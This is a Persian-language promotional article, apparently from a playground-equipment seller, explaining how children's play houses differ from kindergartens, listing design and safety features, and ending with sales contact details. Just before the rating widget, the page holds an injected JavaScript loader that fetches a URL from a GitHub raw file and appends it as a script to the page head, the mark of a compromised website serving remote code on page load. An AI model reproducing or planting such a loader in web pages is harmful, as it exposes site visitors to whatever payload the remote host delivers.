تفاوت خانه بازی با مهد کودک

 • خانه بازی کودک

  خانه بازی کودک چیست؟

  خانه بازی کودک که نام‌ های دیگری چون خانه‌ی اسباب بازی و یا خانه‌ی بازی کودک هم دارند، یک مرکز مراقبت موقت از کودکان است. ممکن است خانه‌های بازی شامل یک زمین بازی کوچک با امکانات کامل باشند و یا محدود تر تنها در شهر بازی ها و مراکز تفریحی.

  این محیط ها از لحاظ سنی معمولا به دو بخش تقسیم بندی میشوند:
  کودکان ۱ تا ۴ سال- کودکان ۵ تا ۱۲ سال
  فرزند شما در هر رده سنی که باشد (تا ۱۲ ) سال میتواند از آنها استفاده کند. البته بعضی از این خانه های کودک تقسیم بندی سنی ندارند.

  زمانی که شما به شهر بازی میروید میتوانید کودکان خود را در این خانه های بازی به مدت جند ساعت قرار دهید. افراد و یا مربی هایی هستند که از فرزند شما نگهداری و مراقبت میکنند. خانه بازی کودک با داشتن وسایل زیاد و متنوع میتواند برای کودکان دارای جذابیت باشد. والدین نیز با قرار دادن کودکان خود در این مکان ها هم از سلامت و مراقبت آنها اطمینان دارند و هم میتوانند کودکان را در محیطی که مناسب انها است با همبازی ها و هم سن و سالان خود مشغول کنند.
  فرض کنید به یک رستوران وو یا مرکز خرید رفته اید. با وجود این خانه بازی کودک میتوانید برای چندین سیاعت کودکان خود را در آنجا قرارهیدو خود با خیال راحت به خرید و دیگر کارهای خود بپردازید.
  اسم این مجموعه با توجه به اینکه خانه بازی کودک است اما حقیقتا مانند یک خانه شبیه خانه های موجود در شهر نیست. بلکه مکانی بزرگ است با وسایل مناسب سن کودکان . مانند یک شهر بازی کودک برای کودکان میباشد. برای کودکان زیر ۲ سال حضور یکی از افراد خانواده و یا فردی که بتواند از کودک مراقبت کند نیاز است.
  امروزه به دلیل فضای کوچک اغلب خانه ها و نبود امکانات زیادی برای بازی فرزندان، کودکانمان به بازی های کامپیوتری و موبایلی روی می آورند. این نوع بازی ها بسیار به ضرر کودکان است. چون ذهن کودک را بسته نکه میدارد و نمیتواند انرژی لازم را تخلیه کند و یا به دست آورد. بنا براین نیاز به این فضا های بازی برای کودکان بسیار مفید است.

  مشغله‌ی کاری و دشواری‌های که در زندگی وجود دارد وقت بسیاری از والدین را به طور کل پر می‌کند و در نتیجه زمان خیلی محدودی برای اختصاص دادن به گردش و تفریح فرزندان خود در اختیار دارند و نمی‌توانند به صورت مداوم فررند خود را به مکان‌هایی مانند شهربازی و پارک ببرند.

  تفاوت خانه بازی با مهدکودک چیست ؟

  تفاوت مهد کودک با خانه بازی در محدودیت مکان، ساعات حضور در آن و وسایل موجود است. در مهد کودک فرزندان تنها با وسایل محدودی میتوانند بازی کنند. همچنین مربیان به دلیل مسئولیتی که در قبال سلامت کودک شما دارند. اجازه بسیار آز بازی ها را به کودکان نمیدهند. اما در خانه بازی کودک وسایل دقیقا متناسب با سن کودک طراحی شده است و آسیبی به سلامت آنها نمیرند. افرادی که در این مکان ها به عنوان محافظ و یا مربی کودکان حضور دارند، دقیقا مطابق با همین مکان ها آموزش دیده اند.

  خانه بازی مفهومی متفاوت از مهدکودک دارد و این دو را نباید اصلاً یکسان دید. این مراکز که با نام خانه کودک شناخته می شوند برای نگهداری از کودکان شما به صورت ساعتی و موقت هستند. مهدکودک از کودکان نگه داری دائمی می کنند درحالی که خانه کودک نگه داری موقت و ساعتی را در دستور کار خود قرار می دهد.

  از لحاظ ایمنی خانه های کودک دارای استاندارد بالایی نسبت به مهد کودک است..  در این مکان شما میتوانید برای فرزندانتان جشن تولد برگزار کنید. در محیطی که از لحاظ طراحی و فضا سازی دقیقا مطابق با کودکان است.

  ویژگی های خانه باز کودک

  رنگ آمیزی فضای خانه‌ی بازی باید برای کودکان شادی آفرین باشد و از رنگ‌های بهداشتی و مناسب برای رنگ آمیزی مکان استفاده شود.مهم‌تر از همه در خانه‌های بازی باید اصول ایمنی و بهداشتی به صورت کامل رعایت شود.

  محل تاسیس خانه‌ی بازی باید مجهز به سیستم سرمایشی و گرمایشی مناسب باشد.

  کفپوش خانه‌های بازی باید از نظر کیفی مناسب و بهداشتی باشد زیرا کودکان دفعات زیادی روی این کفپوش می‌افتند و ممکن است در صورت نامناسب بودن کفپوش دچار بیماری‌های مختلف شوند.

  مهم‌تر از همه در خانه‌های بازی باید اصول ایمنی و بهداشتی به صورت کامل رعایت شود.

  حتی الامکان پله در این مکان ها وجود ندارد تمامی قسمت ها یا استفاده از ضربه گیر پوشانده شده است.

  مکان خانه‌ی بازی کودک باید به شکلی طراحی شود که والدین و کودکان را جذب خود کند، همچنین طراحی فضا باید به شکلی باشد که برای همه‌ی سنین و سلیقه‌ها مناسب باشد. هرقدر در طراحی فضای خانه‌ی بازی از رنگ‌های شادتر و زنده‌تر استفاده شود احتمال جذب مشتریان بیش‌تر خواهد بود.

  طراحی خانه‌ی بازی باید هیجان انگیز و متفاوت باشد همین موضوع نوعی مزیت رقابتی برای کسب و کار شما ایجاد می‌کند.

  فضای راحت و جذاب نیز در ایجاد تفاوت نقش مهمی دارد. تجهیزات موجود در خانه‌ی بازی و خدماتی که ارائه می‌دهید باید کامل باشد.

  برای مثال علاوه بر اسباب بازی، در خانه‎ی بازی خود کارگاه‌های آموزشی مانند سفالگری و نقاشی قرار دهید، برای راحتی والدین رستوران‌های خانوادگی و فروشگاه‌هایی را در محل خانه‌ی بازی تعبیه کنید و در کل سعی کنید فضای سرگرم کننده‌ای برای سنین مختلف به وجود بیاورید.

  برای این‌که خدمات خود را در ذهن مشتریان حک کنید بهتر است از یک لوگوی مخصوص برای خانه‌ی بازی خود استفاده کنید. در طراحی شکل و لوگو دقت زیادی به کار ببرید و علامت تجاری خود را به شکلی طراحی کنید که در ذهن کودکان هم بماند. لوگوی خود را روی تابلوی خانه‌ی بازی و وسایل و تجهیزات موجود در آن نصب کنید. در این صورت خانه‌ی بازی شما علاوه بر تمایز نسب به رقبا، خاص و حرفه‌ای به نظر می‌رسد.

  طبعا کودکان به اقتضای سنشان از نظر روانی آسیب‌پذیرتر هستند و ممکن است کوچک‌ترین رفتار سهوی و یا عمدی نامناسب کارمندان، به سرعت آن‌ها را از تمامی خدمات ارائه داده شده در خانه‌ی بازی دلزده کند.

  جلب اعتماد والدین نیز اهمیت زیادی در مراجعه‌ی دوباره‌ی آن‌ها به خانه‌ی بازی دارد. اگر والدین هنگام بازی کودک در خانه‌ی بازی، با نگرانی فرزند خود را زیر نظر می‌‌‌گیرند و حاضر نیستند او را تنها بگذارند، نشانه‌ی این است که خدمات ارائه شده توسط کارمندان خانه‌ی بازی نتوانسته اعتماد آن‌ها را جلب کند.

  نحوه خرید تجهیزات مهد کودک

  تیم پشتیبانی و مشاوره بادی سازان مجد به صورت دوازده ساعته برای مشاوره رایگان و خرید محصولات در خدمت شما عزیزان است. برای تماس و یا خرید انواع تجهیزات مهد کودک می توانید به صفحه تماس با ما مراجعه نمایید و یا با شماره تلفن ۰۹۱۲۷۴۸۴۵۷۳ تماس حاصل فرمایید. و یا در شبکه های اجتماعی تلگرام، ایتا، روبیکا و واتساپ با همین شماره تماس بگیرید.

  (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

  امتیاز شما:

  میانگین امتیازات ۵ از ۵
  از مجموع ۱ رای

  دیدگاهتان را بنویسید